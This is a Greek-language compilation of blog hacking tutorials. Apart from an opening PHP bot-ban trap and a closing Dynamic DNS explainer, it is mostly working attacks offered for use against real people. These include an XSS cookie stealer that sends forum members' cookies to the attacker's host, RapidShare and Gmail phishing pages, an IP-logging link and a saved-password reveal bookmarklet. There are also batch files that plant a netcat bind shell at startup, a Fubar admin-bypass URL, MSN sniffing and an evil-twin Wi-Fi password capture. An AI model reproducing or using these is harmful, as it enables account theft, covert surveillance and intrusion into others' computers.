Δημιουργία της παγίδας
Το πρώτο πράγμα που θα πρέπει να κάνουμε είναι να ρυθμίσουμε την παγίδα.Θα δημιουργήσουμε λοιπόν έναν φάκελο με το όνομα trap μέσα στο root.Έτσι όταν ένα bot ή ένα scanner μπει σε αυτόν τον φάκελο η IP του θα γίνει αυτόματα ban.Επίσης αυτό θα συμβεί και για όλους τους χρήστες ή επισκέπτες της ιστοσελίδας που θα προσπαθήσουν να μπούνε σε αυτόν τον φάκελο.
Θα πρέπει επίσης να σιγουρευτούμε ότι δεν θα μπανάρουμε τα γνήσια bots όπως το Googlebot,Yahoobot κτλ.Μπορούμε να το αποφύγουμε αυτό το σενάριο απλά προσθέτοντας το παρακάτω στο αρχείο robots.txt:
User-agent: *
Disallow: /trap/
Τα περισσότερα bots θα υπακούσουν σε αυτήν την ρύθμιση και δεν θα μπούνε στον φάκελο trap. 
Το επόμενο βήμα είναι να δημιουργήσουμε το αρχείο index.php μέσα στον φάκελο με το όνομα trap και να προσθέσουμε το ακόλουθο:
<?php
$agent = $_SERVER['$HTTP_USER_AGENT'];
$datum = date(“Y-m-d (D) H:i:s”,$tmestamp);
$ipad = $_SERVER['REMOTE_ADDR'];
$ban = “Deny from $ipad # /trap/ $agent – on $datum \r\n”;
$file = “../.htaccess”;
$search = file_get_contents($file);
$check = strpos($search, $ipad);
if ($check === FALSE) {
$open = @fopen($file, “a+”);
$write = @fputs($open, $ban);
    echo “The IP <b>”.$ipad.”</b> has been blocked for an invalid access attempt to a file, directory, or a scanning atempt.;
@fclose($open);
} else {
    echo “The IP <b>”.$ipad.”</b> has been blocked for an invalid access attempt to a file, directory, or a scanning atempt.”;
}
exit;
?>

Σημείωση:
$ban—>Ότι θα γραφτεί στο αρχείο .htaccess.Οτιδήποτε μετά τo σύμβολο # είναι σχόλιο.Επίσης το αρχείο .htaccess θα πρέπει να έχει δικαιώματα 666.
$file—->Βάζουμε την διαδρομή που βρίσκεται η παγίδα μας
Ενεργοποίηση της παγίδας
Τώρα που το σύστημα είναι τοποθετημένο θα πρέπει να ρυθμίσουμε το δόλωμα για τα bots.Τοποθετούμε λοιπόν τον παρακάτω κώδικα μέσα στο αρχείο index στον φάκελο root.
<a href=”/trap/”><img src=”images/pix.JPG” border=”0″ alt=” ” width=”1″ height=”1″></a>
Όταν ένα scanner ή ένα bot μπεί στην αρχική σελίδα μας θα εντοπίσει το παραπάνω link και θα κατευθυνθεί προς αυτό όπου και θα γίνει ban η IP του.
Αποτέλεσμα:
Το αποτέλεσμα αυτής της παγίδας όταν κάποιο bot ή scanner εισέλθει στον φάκελο trap θα είναι το ακόλουθο:
Deny from ***.***.***.***,# /admin/ – on 2009-08-20 (Wed) 16:00:00

Πώς να κλέψουμε τα account μελών από ένα φόρουμ

Μία από τις πιο διαδεδομένες τεχνικές για να κλέψουμε τον λογαριασμό κάποιου χρήστη ή και πολλών χρηστών είναι να χρησιμοποιήσουμε την μέθοδο XSS (Cross Site Scripting).
Θα πρέπει καταρχάς να χρησιμοποιήσουμε κάποιο web vulnerability scanner όπως το Acunetix ή το Paros για να βρούμε τα ευάλωτα φόρουμ σε επιθέσεις XSS.Μόλις εντοπίσουμε τον στόχο μας ακολουθούμε την παρακάτω διαδικασία.
1)Δημιουργούμε ένα αρχείο με το όνομα cookie.php και εισάγουμε τον παρακάτω κώδικα:
<?php
$cookie = $_GET['c'
];
$ip = getenv (’REMOTE_ADDR’
);
$date=date(”j F, Y, g:i a”
);;
$referer=getenv (’HTTP_REFERER’
);
$fp = fopen(’cookies.html’, ‘a’
);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’
);
fclose($fp
);
header (”Location: http://www.test.com
”);
?> 
 
Το αρχείο cookie.php το ανεβάζουμε σε κάποιο host site που έχουμε.Φυσικά στην προτελευταία σειρά τοποθετούμε την διεύθυνση του host μας αντί για test.com δηλαδή.
2)Δημιουργούμε ένα νέο thread στο ευάλωτο φόρουμ και πληκτρολογούμε το ακόλουθο:
<script>document.location=”http://www.myhost.com/cookie.php?c=” + document.cookies</script>
Φυσικά στο myhost.com βάζουμε το δικό μας host όπως είναι κατανοητό.
Τώρα όταν κάποιο μέλος του φόρουμ ανοίξει το thread τα cookies του θα σταλούν στο:
http://www.myhost.com/cookie.html
Οπότε έχοντας το cookie και σε συνδοιασμό με το πρόγραμμα Cain ή κάποιο άλλο cookie decoder θα μπορέσουμε να αποκρυπτογραφήσουμε το cookie για να βρούμε το password.

Υποκλέπτοντας τις συζητήσεις στο MSN σε ένα δίκτυο

Αν είμαστε σε κάποιο δίκτυο (δουλειά,πανεπιστήμιο,σχολείο κτλ) και θέλουμε να κατασκοπεύσουμε για κάποιον δικό μας λόγο τις συζητήσεις στο MSN των άλλων που βρίσκονται εκείνη την ώρα στο δίκτυο μπορούμε πολύ εύκολα και γρήγορα με την παρακάτω διαδικασία να το επιτύχουμε.
Τι θα χρειαστούμε?
Υπάρχουνε διάφορα εργαλεία και προγράμματα που μπορούμε να χρησιμοποιήσουμε για να το επιτύχουμε αυτό αλλά στην προκειμένη περίπτωση θα χρησιμοποιήσουμε το Net Tools και το MSN live plus με το IPGet.
Που θα τα βρούμε?
Το IPGet είναι ένα perl script το οποίο θα πρέπει να το ενσωματώσουμε στο MSN live plus και μπορούμε να το βρούμε στο παρακάτω σύνδεσμο.
http://rapidshare.com/files/29545130/MZN_-_HaCK_iPGET.rar
το MSN Plus live από:
http://www.msgpluslive.net/download/
και τα Net  Tools:
http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html
Τι κάνουμε αφού τα κατεβάσουμε?
Εφόσον τα έχουμε κατεβάσει και τα έχουμε κάνει εγκατάσταση ενσωματώνουμε το IPGet στο MSN προκειμένου να μπορούμε να βρούμε τις IP των επαφών μας εύκολα και γρήγορα.
Στέλνουμε μία φωτογραφία στην επαφή που θέλουμε να δούμε τις συζητήσεις που θα κάνει.Το IPGet θα πάρει την IP της επαφής μας και θα την αποθηκεύσει.
Έχοντας την IP ανοίγουμε τα Net Tools και συγκεκριμένα το εργαλείο Messenger Packet Sniffer.Βάζουμε την IP και στο  C:\Program Files\Net Tools\MessengerSpyLog.txt (αν έχουμε κάνει εγκατάσταση τα Net Tools στο Program Files) θα περιέχονται όλες τις συζητήσεις που θα κάνει το θύμα μας από την στιγμή που θα αρχίσουμε το sniffing.

Η τεχνική του phishing

Μία τεχνική του χάκινγκ που χρησιμοποιείται για κλέψιμο κωδικών και λογαριασμών είναι το Phishing.Στο συγκεκριμένο άρθρο θα αναλύσουμε την τεχνική αυτήν μέσα από ένα παράδειγμα για να δούμε πως μπορούν οι χάκερς να μας ξεγελάσουν για να κλέψουν τα account μας.
Θα χρησιμοποιήσουμε την ιστοσελίδα rapidshare.com σαν παράδειγμα για το άρθρο μας.
Πηγαίνουμε λοιπόν στο site http://www.rapidshare.com και επιλέγουμε να πάμε στην σελίδα premium zone.Εκεί κάνουμε δεξί κλικ στην σελίδα και επιλέγουμε προβολή προέλευσης.Επιλέγουμε όλο των κώδικα και τον αντιγράφουμε σε ένα έγγραφο σημειωματαρίου.
Στον κώδικα μας ενδιαφέρουν δύο λέξεις:method και action.Ψάχνουμε με την εύρεση (ctrl+F) για να βρούμε που αναφέρεται η λέξη method.Θα δούμε ότι στο αποτέλεσμα θα μας εμφανίσει method=”post” και αλλάζουμε το post με την λέξη get.
Τώρα ψάχνουμε για την λέξη action μέσα στον κώδικα και θα δούμε κάτι σαν το παρακάτω:
 action=”https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi
Αντικαθιστούμε τον παραπάνω σύνδεσμο με το next.php δηλαδή:
action=”next.php”
Σώζουμε αυτό το αρχείο σαν index.html και τώρα θα δημιουργήσουμε την σελίδα next.php.Δημιουργούμε ένα νέο έγγραφο σημειωματαρείου και πληκτρολογούμε τον παρακάτω κώδικα:
Κώδικας:
<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER['REMOTE_ADDR'];
header(“Location: Edw vazoume to redirect url mas”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie (“user”, “empty”, time()+3600);
exit;
?>

Η σελίδα next.php θα είναι και η σελίδα στην οποία θα κατευθυνθούν οι χρήστες αφότου βάλουν τις πληροφορίες λογαριασμού τους στην πρώτη σελίδα.
Στον παραπάνω κώδικα μετά από την λέξη location βάζουμε το redirect url μας το οποίο μπορεί να είναι η αυθεντική σελίδα του rapidshare ή οποιαδήποτε άλλη σελίδα επιθυμούμε εμείς να κατευθύνει τα θύματα μας αφότου βάλουν τις πληροφορίες του λογαριασμού τους.
Επιλέγουμε για το παράδειγμα μας την αυθεντική σελίδα του rapishare.Δηλαδή θα έχουμε:
header(“Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi&#8221;);
Σώζουμε αυτό το αρχείο σαν next.php και τώρα δημιουργούμε ένα ακόμα έγγραφο σημειωματαρείου με την ονομασία password.txt το οποίο και θα είναι το έγγραφο στο οποίο θα αποθηκεύονται οι πληροφορίες των λογαριασμών των θυμάτων.
Πηγαίνουμε σε ένα free web hosting site που υποστηρίζει php (όπως http://www.freeweb7.com/) και αφού σιγουρευτούμε ότι έχουμε διαγράψει όλα τα default αρχεία που υπάρχουν από τον web hosting provider όπως το index.html  ανεβάζουμε τα 3 αρχεία μας (index.html,next.php,password.txt).
Τώρα πηγαίνουμε στην ιστοσελίδα που έχουμε φτιάξει την ψεύτικη και βάζουμε test στο login και test στο password για να τσεκάρουμε αν θα εμφανιστούν στο password.txt.Αν εμφανιστούν τότε σημαίνει ότι η ψεύτικη μας σελίδα δουλεύει.
Με την παραπάνω μεθοδολογία θα δουλέψει ένας phisher για να κλέψει κωδικούς.Γι’αυτό μην βάζετε ποτέ τους κωδικούς σας σε ιστοσελίδες που δεν εμπιστεύεστε και πάντα να κοιτάτε το url για να δείτε αν είναι το αυθεντικό ή κάποιο που μοιάζει με το αληθινό domain και θέλει να μας παραπλανήσει.
Σημείωση:
Το παραπάνω παράδειγμα είναι απλώς για εκπαιδευτικούς σκόπους και δεν συνίσταται η χρήση του ενάντια σε άλλους χρήστες.Το datalibrary δεν φέρει ουδεμία ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλους σκοπούς.

Πώς θα βρούμε την IP διεύθυνση από κάποιον χρήστη

Πολλοί χρήστες έχουν αναρωτηθεί για το πως μπορούν να βρουν την IP διεύθυνση από κάποιον που κάνουνε chat ή κάποιου φίλου τους.Η παρακάτω μέθοδος θα μας δώσει την δυνατότητα λοιπόν να βρούμε την IP οποιουδήποτε χρήστη. 
Αντιγράφουμε τον παρακάτω κώδικα σε ένα αρχείο σημειωματαρείου και το σώζουμε με το όνομα ip.php (μπορούμε όμως να δώσουμε και ότι όνομα θέλουμε) και αμέσως μετά δημιουργούμε ένα νέο αρχείο σημειωματαρείου με την ονομασία ip_log.Το αρχείο ip_log είναι και αυτό που θα κρατάει τις IP διευθύνσεις.
Κώδικας:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date(“l dS \of F Y h:i:s A”);
$file=fopen(“ip_log.txt”,”a”);
$data = $ip.’ ‘.$dt.”\n”;
fwrite($file, $data);
fclose($file);
header( ‘Location:
http://www.google.com’ ) ;
?>

Ανεβάζουμε τα δύο αυτά αρχεία σε κάποιο hosting που να υποστηρίζει php και δίνουμε δικαιώματα 777 στο αρχείο ip_log.txt.Τώρα το μόνο που έχουμε να κάνουμε είναι να δώσουμε το link που θα παραπέμπει στο αρχείο ip.php στο πρόσωπο που θέλουμε να μάθουμε την IP του.
Μόλις το ανοίξει η IP του θα καταγραφεί στο ip_log.txt μαζί με την ημερομηνία και την ώρα και θα κατευθυνθεί στο google.com αμέσως προκειμένου να μην υποπτευθεί τίποτα.

Πώς θα έχουμε απεριόριστο χρόνο στα Internet Cafe

Όλοι μας θα θέλαμε να πληρώνουμε λιγότερα όταν πάμε σε κάποιο Internet Cafe ιδιαίτερα αν δεν είμαστε μέλη του.Υπάρχει λοιπόν ένας τρόπος που σε κάποια Internet Cafe μπορεί να δουλέψει και να μην χρειαστεί να πληρώσουμε σχεδόν τίποτα για τις ώρες που θα καθίσουμε.Τι κάνουμε λοιπόν για να το επιτύχουμε αυτό?
Δημιουργούμε ένα αρχείο σημειωματαρείου και πληκτρολογούμε cmd.Σώζουμε το αρχείο με προέκταση .bat και δίνοντας κάποιο όνομα που θέλουμε.Έπειτα τρέχουμε το bat αρχείο και θα δούμε ότι θα ανοίξει η γραμμή εντολών.
Τώρα πληκτρολογούμε την εντολή cd/windows για να μετακινηθούμε στον φάκελο των Windows και γράφουμε regedit για να μπούμε στην registry.Στην registry ψάχνουμε να βρούμε τον παρακάτω φάκελο:
HKEY_CURRENT_USER>Appevents>software>classes>microsoft>      windows>     current version>  internet settings>policies>system
Στην δεξία πλευρά θα δούμε ένα κλειδί με την ονομασία Disable Task Manager.Με δεξί κλικ και επεξεργασία αλλάζουμε την τιμή σε αυτό το κλειδί από 1 σε 0.
Έπειτα ανοίγουμε την διαχείριση εργασιών με Ctrl+Alt+Del και απενεργοποιούμε το timer του Internet Cafe που είμαστε.

Χακάροντας τα Fubar φόρουμ

Μία τεράστια αδυναμία υπάρχει στις version 1.6 των Fubar forums την οποία αν την εκμεταλευτούμε μπορούμε να αποκτήσουμε δικαιώματα Admin.Ασφαλώς δεν υπάρχουν πάρα πολλά Fubar forums στο Internet αλλά με ένα κατάλληλο search μπορούμε να βρούμε ακόμα μερικά τα οποία δεν έχουν κλείσει την τρύπα.
Το πρώτο πράγμα που θα πρέπει να κάνουμε λοιπόν είναι να έχουμε το exploit το οποίο είναι το παρακάτω:
/forum/index.php?page=admin
Το επόμενο μας βήμα είναι να βρούμε κάποιο φόρουμ που να τρέχει την έκδοση 1.6 για να χρησιμοποιήσουμε το exploit.Ανοίγουμε λοιπόν το Google και ψάχνουμε για Fubar Forums βάζοντας στην εύρεση Powered by Fubar Forum v1.6.
Όπως θα δείτε από τα αποτελέσματα υπάρχουν αρκετά φόρουμς που έχουν ήδη γίνει deface από χάκερς καθώς πρόκειται για ένα πολύ απλό exploit που ο καθένας μπορεί να το χρησιμοποιήσει.Βρίσκουμε λοιπόν τον στόχο μας και στην μπάρα διευθύνσεων προσθέτουμε το /forum/index.php?page=admin
Δηλαδή το link μας θα πρέπει να είναι της μορφής www.xxxx.xxx/forum/index.php?page=admin μετά την προσθήκη του exploit.Πατάμε το enter και πλέον βλέπουμε ότι έχουμε δικαιώματα διαχειριστή και μπορούμε να δημιουργήσουμε και να διαγράψουμε φόρουμ και κατηγορίες.
Φυσικά όλα αυτά θα πρέπει να τα κάνουμε χρησιμοποιώντας κάποιον proxy server προκειμένου να προστατέψουμε την IP μας και την ανωνυμία μας.

Πώς θα σπάσουμε τα password πίσω από τα ****

Αν βρισκόμαστε σε κάποιον δημόσιο υπολογιστή (σχολείο,πανεπιστήμιο,δουλειά κτλ.) είναι πολύ πιθανό να βρούμε κάποιες ιστοσελίδες στις οποίες κάποιος χρήστης νωρίτερα να έχει κάνει login και ο browser να έχει κρατήσει τα στοιχεία του λογαριασμού του.Όμως ακόμα και αν γνωρίζουμε το όνομα του account πως θα δούμε τι κρύβεται πίσω από τα **** του κωδικού του?
Μέθοδος 1
Το μόνο που θα πρέπει να κάνουμε είναι να αντιγράψουμε τον παρακάτω κώδικα στην μπάρα διευθύνσεων του browser μας και ενώ βρισκόμαστε στην ιστοσελίδα με την login φόρμα και με το password σε μορφή ****
Κώδικας:
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert(‘Password not found in ‘ + g + ‘ forms’);}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s=”;if (ej.type==’password’){s=ej.value;if (s!=”){prompt(‘Password found ‘, s)}else{alert(‘Password is blank’)}return true;}}
Εικόνα:
Αποκάλυψη κωδικών πίσω από τα ****
Μέθοδος 2
Ένας άλλος τρόπος είναι να κατεβάσουμε το πρόγραμμα Asterisk Key και να το τρέξουμε.Όταν θα βρισκόμαστε στην ιστοσελίδα με το login και ενώ υπάρχει ήδη το password στην φόρμα με την μορφή **** πατάμε στο μενού Show Internet Explorer Passwords
Download: Asterisk Key
Μέθοδος 3
Χρησιμοποιώντας την εφαρμογή SC-PassUnleash.Η εφαρμογή αυτήν δουλεύει μόνο σε συγκεκριμένους FTP και Email Clients αλλά μπορεί να μας φανεί χρήσιμη σε περίπτωση που θέλουμε να βρούμε το email password κάποιου που είναι αποθηκευμένο σε κάποιο client π.χ Outlook.
Εικόνα 2:

Download: SC-PassUnleash
Υποσημείωση:
Το Javascript έχει ανεβεί σε μορφή .txt για να μην υπάρχει πρόβλημα με τον τρόπο που διαχειρίζεται τα “” η wordpress.

Βρίσκοντας κωδικούς Gmail με την μέθοδο Phishing

Μία από τις πιο αποδοτικές μεθόδους για να χακάρουμε κάποιον λογαριασμό είναι η μέθοδος του Phishing.Ο λόγος είναι ότι αν το θύμα μας πιστέψει ότι η σελίδα στην οποία θα βάλει τον κωδικό του είναι η αυθεντική τότε εμείς άμεσα θα έχουμε τον κωδικό του χωρίς να προσπαθούμε για μέρες να το σπάσουμε με άλλες μεθόδους.
Για να βρούμε λοιπόν κάποιον κωδικό του Gmail με την μέθοδο του phishing αρκεί να κάνουμε τα παρακάτω:
1)Κατεβάζουμε την ψεύτικη σελίδα του Gmail και κάνουμε εξαγωγή τα περιεχόμενα του σε έναν φάκελο
Ψεύτικη Gmail σελίδα:
2)Δημιουργούμε έναν free λογαριασμό σε κάποιο από τα παρακάτω site:
 www.t35.com
www.ripway.com
www.110mb.com
3)Ανεβάζουμε σε όποιο από τα παραπάνω site έχουμε κάνει λογαριασμό όλα τα αρχεία που έχουν γίνει εξαγωγή (βήμα 1).Για το παράδειγμα μας θα επιλέξουμε την ιστοσελίδα www.t35.com
4)Ανοίγουμε την ψεύτικη σελίδα του Gmail και βάζουμε κάποιο ψεύτικο username και password για να δούμε ότι όντως λειτουργεί.Η ψεύτικη σελίδα μας θα βρίσκεται στο παρακάτω link:
http://onomatousitesas.t35.com/Gmail.htm
5)Ένα αρχείο με τον κωδικό που έχει εισαχθεί θα δημιουργηθεί στον ίδιο φάκελο και θα μπορείτε να το δείτε στο παρακάτω link:
http://onomatousitesas.t35.com/GmailPasswords.htm
Πλέον είστε έτοιμοι να βρείτε κωδικούς λογαριασμών gmail αρκεί να διαμοιράσετε το ψεύτικο site που θα μοιάζει με το gmail έξυπνα ούτως ώστε να ψάρεψετε όσους περισσότερους λογαριασμούς μπορείτε.
Υποσημείωση:
Αυτό το άρθρο είναι για εκπαιδευτικούς σκοπούς και μόνο και η datalibrary δεν φέρει καμία ευθύνη για το πως θα χρησιμοποιήσετε τα αρχεία που θα κατεβάσετε.

Χάκινγκ σε υπολογιστή δικτύου

Όπως όλοι γνωρίζουμε ένα trojan είναι πολύ πιθανόν να ανακαλυφθεί από τα antivirus οπότε αυτό που θα χρειαστούμε στην συγκεκριμένη περίπτωση είναι το netcat.Το netcat είναι ένα πρόγραμμα το οποίο ανοίγει μία θύρα (port) σε κάποιον υπολογιστή για να μας δώσει πρόσβαση.
Θα πρέπει λοιπόν να γράψουμε ένα batch αρχείο το οποίο θα αντιγράφει το netcat στον απομακρυσμένο υπολογιστή.Για να γίνει αυτό θα πρέπει το batch αρχείο να εκτελεστεί με κάποιον τρόπο από τον υπολογιστή που θέλουμε να χακάρουμε.
Ανοίγουμε το σημειωματάρειο και πληκτρολογούμε το ακόλουθο:
@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe
cd “Documents and Settings”
cd “All Users”
cd “Start Menu”
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (Αυτό είναι ένα άλλο batch αρχείο που θα γράψουμε παρακάτω)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Σώζουμε το αρχείο σαν .bat
Το επόμενο batch αρχείο θα χρησιμοποιηθεί για να σιγουρευτούμε ότι το port που καθορίσαμε θα ανοίγει κάθε φορά που θα κάνουν εκκίνηση τα windows.Μπορούμε φυσικά να βάλουμε όποιο port επιθυμούμε.Ανοίγουμε λοιπόν το σημειωματάρειο πάλι και γράφουμε το εξής:
@echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Σώζουμε το αρχείο σαν .bat.Αυτό θα είναι το αρχείο που θα αντιγραφεί στον φάκελο startup από το προηγούμενο bat που είχαμε γράψει.
Μπορούμε φυσικά να κρύψουμε αυτό το αρχείο σε ένα άλλο αρχείο και να το διαμοιράσουμε μέσα στο δίκτυο.Όταν κάποιος τρέξει το αρχείο το netcat θα αντιγραφεί στον υπολογιστή του και θα ανοίξει μία θύρα στην προκειμένη περίπτωση είναι η 9999.Μόλις η θύρα ανοίξει μπορούμε να χρησιμοποιήσουμε το telnet σε αυτήν την θύρα του απομακρυσμένου υπολογιστή και να αποκτήσουμε πλήρης πρόσβαση.
Τώρα που έχουμε πλήρης πρόσβαση το επόμενα βήμα είναι να αλλάξουμε το administrator password με την εντολή:
net user Administrator newpassword
Πλέον μπορούμε να κάνουμε ότι θέλουμε στον υπολογιστή όπως για παράδειγμα να τερματίσουμε την λειτουργία του κτλ.Μπορούμε να το κάνουμε αυτό απλώς αν μπούμε στον φάκελο System32 και πληκτρολογήσουμε το παρακάτω:
shutdown -r -t 10 -c “Hello”
Ο απομακρυσμένος υπολογιστής θα κάνει επανεκκίνηση μέσα σε 10 δευτερόλεπτα.Μπορούμε αν θέλουμε να το προχωρήσουμε ακόμα πιο μακριά απλά και μόνο αν εγκαταστήσουμε το Cain & Abel στον υπολογιστή μας και μετά εγκαταστήσουμε το Abel στον απομακρυσμένο υπολογιστή εφόσον πλέον ξέρουμε και το administrator password.Μόλις εγκατασταθεί το Abel στον απομακρυσμένο υπολογιστή μπορούμε να κάνουμε εκκίνηση και τερματισμό υπηρεσίων και πολλά περισσότερα… 
Κατεβάστε το netcat από εδώ.

Δημιουργία ψεύτικου δικτύου για εύρεση κωδικών

Όλοι οι χρήστες έχουν την τάση εφόσον βρίσκουν κάποιο ασύρματο δίκτυο να προσπαθούν να συνδεθούν προκειμένου να εκμεταλευτούν την σύνδεση για να διαβάσουν τα email τους,να μπούνε στο facebook,να μιλήσουν MSN κτλ.Εμείς μπορούμε να εκμεταλευτούμε αυτήν την τάση προς ώφελο μας  φυσικά και να δημιουργήσουμε ένα ψεύτικο δίκτυο (που θα φαίνεται όμως σαν αληθινό για τους απέξω) για να ανακαλύψουμε κωδικούς και διάφορες άλλες πληροφορίες.
Τι θα χρειαστούμε?
  • Ένα laptop
  • Μία σύνδεση στο Internet ασύρματη (κατά προτίμηση 3G)
  • Το wireshark
Δημιουργία του δικτύου
Το πρώτο πράγμα που θα πρέπει να κοιτάξουμε είναι να επιβεβαιώσουμε ότι η ασύρματη κάρτα δικτύου μας υποστηρίζει την δημιουργία ad-hoc δικτύων.Εφόσον το δούμε αυτό δημιουργούμε ένα νέο δίκτυο ad-hoc με την ονομασία linksys διότι τα linksys είναι από τα router που χρησιμοποιούνται συνήθως και είναι πολύ πιθανό να βρίσκεται στην λίστα της ασύρματης τους κάρτας με τα δίκτυα που θα συνδέονται αυτόματα.Το ad-hoc το επιλέγουμε γιατί οι υπόλοιποι υπολογιστές που θα συνδεθούν στο δίκτυο θα συνδεθούν μέσω του υπολογιστή μας.Δηλαδή ο υπολογιστής μας θα είναι φαινομενικά για αυτούς ο router που όμως στην πραγματικότητα δεν θα υπάρχει.
Αφού δημιουργήσαμε το δίκτυο ενεργοποιούμε από τις ιδιότητες της νέας σύνδεσης του δικτύου μας το ICS (Internet Connection Sharing).Ο λόγος που θα το κάνουμε αυτό είναι για να έχουν πρόσβαση στο Internet όλοι όσοι συνδεθούν στο δίκτυο μας.
Αν βρισκόμαστε με το laptop μας σε κάποια περιοχή με πολύ κόσμο όπως κάποιο mall,τότε είναι πολύ πιθανό αρκετοί χρήστες να αρχίσουν να συνδέονται αφού συνηθώς πολλοί άνθρωποι ψάχνουν για δίκτυα είτε με τα netbook τους,είτε με τα κινητά τους τηλέφωνα προκειμένου να τσεκάρουν τα email τους κτλ.Δεδομένου ότι το δικό μας δίκτυο θα είναι και ανοικτό ακόμα και αν δεν βρίσκεται στην auto connect λίστα της κάρτας τους είναι πολύ πιθανό κάποιοι να το προτιμήσουν.
Εύρεση των κωδικών
Τώρα που έχουμε κάποια άτομα συνδεδεμένα στο δίκτυο μας θα πρέπει να αρχίσουμε να ελέγχουμε το τι κάνουν με την σύνδεση μας.Γι’αυτό θα χρειαστούμε το wireshark το οποίο είναι ουσιαστικά ένα sniffer και θα ελέγχει όλα τα πακέτα που θα περνάνε από το δίκτυο μας και κατά συνέπεια και όλα τα passwords που θα εισαχθούν σε ιστοσελίδες.Το ρυθμίζουμε ώστε να κάνει capture το interface (δηλαδή την κάρτα δικτύου) που χρησιμοποιούμε για να διαμοιράσουμε το Internet και το αφήνουμε να καταγράφει όλη την κίνηση του δικτύου και κατά συνέπεια και τους κωδικούς σε περίπτωση που κάποιος χρήστης του δικτύου τους εισάγει σε κάποια ιστοσελίδα.
Πρακτικά δεν έχουμε να κάνουμε κάτι άλλο απλά να το αφήσουμε για κάποια ώρα το wireshark και μετά να αναλύσουμε τα πακέτα για να  εντοπίσουμε τα passwords.Η λογική πίσω από αυτήν την τεχνική είναι να παίξουμε με την μνήμη των laptop/netbook και λοιπών gadget που όλο και σε κάποιο linksys δίκτυο θα έχουν συνδεθεί στο παρελθόν και έτσι να συνδεθούν αυτόματα πάνω σε μας αλλά και το γεγονός ότι θα πρόκειται για ένα ανοικτό δίκτυο σίγουρα θα προσελκύσει και άλλους επίδοξους χρήστες.

Τετάρτη 14 Αυγούστου 2013

Tι είναι Dynamic DNS, Port Forwarding & NAT;

Σε αυτό το άρθρο θα μάθουμε μερικές βασικές έννοιες γύρω από τον κόσμο του ADSL όπως το Dynamic DNS, Port Forwarding & NAT. Αυτές οι βασικές έννοιές θα πρέπει να τις ξέρετε από την πρώτη σας επαφή με το ΑDSL.


Ας τις γνωρίσουμε μία-μία…


Αρχίζοντας με το Dynamic DNS!


Dynamic DNS


Πώς θα ήταν το Internet αν σε κάθε site που σας αρέσει και θα θέλατε να επισκεφθείτε να αντιστοιχούσε ένας δεκαψήφιος αριθμός; Σίγουρα δεν θα ήταν το ευκολότερο για να το θυμηθείτε ,ε; Ευτυχώς για αυτή την δουλειά υπάρχουν οι λεγόμενοι Domain Name Servers που, κρατώντας ένα μεγάλο αρχείο μπορούν ανά πάσα στιγμή να μας ενημερώνουν για τον αριθμό που κρύβετε πίσω από το όνομα κάθε μεγάλου site (adslgr.com).

To ίδιο ισχύει και για τις ADSL συνδέσεις, αφού όπως είπαμε είναι αρκετά εύκολο και και απλό να κρατήσουμε μια σύνδεση ανοιχτή για αρκετές μέρες, χρησιμοποιώντας την για διάφορους λόγους, όπως για την δημιουργία ενός File Server, που θα μας επιτρέπει να έχουμε πρόσβαση στα αρχεία που βρίσκονται στον υπολογιστή του σπιτιού ενώ εμείς βρισκόμαστε στο γραφείο μας ή στο σπίτι ενός φίλου. Επίσης μπορούμε να κάνουμε ένα gaming server για εμάς και τους φίλους μας.


Αν θέλουμε λοιπόν να αντικαταστήσουμε την IP Address μας σε με ένα εύκολο όνομα μπορούμε να το κάνουμε σχεδόν ανέξοδα αποφεύγοντας την χρέωση από registration ενός Domain χρησιμοποιώντας κάποια από τις πολλές υπηρεσίες Dynamic DNS. Oι εν λόγω υπηρεσίες μας ,μας προσφέρουν τις περισσότερες φορές αφιλοκερδώς να μας προμηθεύσουν με ένα δικτυακό όνομα , το οποίο θα επιλέξουμε ανάμεσα στα πολλά που διαθέτουν.

Μια απλή έρευνα για Dynamic DNS στο Google θα μας οδηγήσει κατευθείαν στις μεγαλύτερες όπως η www.DynDNS.com και η www.No-IP.com . To registration είναι εξαιρετικά απλό και μπορούμε να ολοκληρώσουμε την διαδικασία μέσα σε λίγα λεπτά. Το δυσκολότερο ίσως πρόβλημα που θα αντιμετωπίσουμε είναι η επιλογή κάποιου από τα πολλά domains που διαθέτει η κάθε εταιρία, το οποίο θα χρησιμοποιήσουμε ως βάσει το δικό μας.


Έτσι για παράδειγμα αν έχουμε σκοπό να «σηκώσουμε» κάποιον game server μπορούμε να επιλέξουμε το domain «game-host.org» και κατόπιν να δηλώσουμε το όνομα που θα το συνοδεύει. Το όνομα θα πρέπει να έχει την μορφή «mygameserver.game-host.org». Νομίζω ότι είναι πολύ απλό!?

Το καλύτερο όμως δεν σας το είπα ακόμη! Αν και αρκετές από αυτές τις υπηρεσίες λειτουργούν καλύτερα όταν συνοδεύονται που ενημερώνουν αυτόματα τους servers τους, όπως είναι το DynSite, υπάρχει η δυνατότητα να χρησιμοποιήσουμε ακόμα και το router μας (αν το υποστηρίζει, φυσικά) γλιτώνοντας ακόμη περισσότερα χρήματα.

Όλα τα router της USR τουλάχιστον, υποστηρίζουν αυτήν την δυνατότητα. Γι’αυτό λοιπόν χρειάζεται μεγάλη προσοχή στη συσκευή που θα επιλέξουμε για να σερφάρουμε στο Διαδίκτυο!


